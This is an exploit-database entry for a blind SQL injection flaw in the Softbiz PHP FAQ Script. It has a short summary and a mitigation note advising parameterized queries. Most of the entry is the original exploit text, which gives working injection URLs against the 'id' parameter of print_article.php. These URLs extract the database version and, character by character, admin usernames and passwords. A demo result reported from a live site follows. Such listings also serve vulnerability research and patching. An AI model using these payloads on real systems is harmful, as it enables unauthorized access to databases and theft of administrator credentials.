Softbiz PHP FAQ Script Blind SQL Vulnerability

vendor:

Softbiz PHP FAQ Script

by:

Sangteamtham

7,5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Softbiz PHP FAQ Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Softbiz PHP FAQ Script Blind SQL Vulnerability

Softbiz PHP FAQ Script is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by sending a crafted HTTP request with malicious SQL query to the vulnerable server. The malicious SQL query can be used to extract sensitive information from the database such as usernames, passwords, etc. The vulnerable parameter is the ‘id’ parameter in the ‘print_article.php’ script. An attacker can use the ‘substring’ function to extract the version of the database installed on the server. The attacker can then use the ‘select’ statement to extract the data from the database.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries. This will ensure that the user input is treated as a string and not as a part of the SQL query. Additionally, the application should be tested for SQL injection vulnerabilities using automated tools.

Source

Exploit-DB raw data:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$  Softbiz PHP FAQ Script Blind SQL Vulnerability                             $
$  Author : Sangteamtham                                                                    $
$  Home  : Hcegroup.net & vnbrain.net                                                 $
$  Download :http://www.softbizscripts.com/FAQ-script-features.php   $
$                   					           $
$***********************************************************
$
$ check version : http://server.com/fag/print_article.php?id=[id number]+and substring(version(),1,1)=4 
$                        http://server.com/fag/print_article.php?id=[id number]+and substring(version(),1,1)=5
$                        http://server.com/fag/print_article.php?id=[idnumber]+and+(select+substring(concat(1,password_column),1,1)+from+admin_info_table+limit+0,1)=1/*  
$                        http://server.com/fag/print_article.php?id=[idnumber]+and+(select+substring(concat(1,username_column),1,1)+from+admin_info_table+limit+0,1)=1/*
$  note: password_column,username_column,admin_info_table depend on the database installed
$***********************************************************
$ Demo: 
$ In the demo site : 
$ 
$ Exploit:http://server/faq/print_article.php?id=5+and substring(version(),1,1)=5 
$ 
$ MySQL version: 5.0.81-community
$ User: softbiz_kuber@localhost
$ Dataabase: softbiz_faq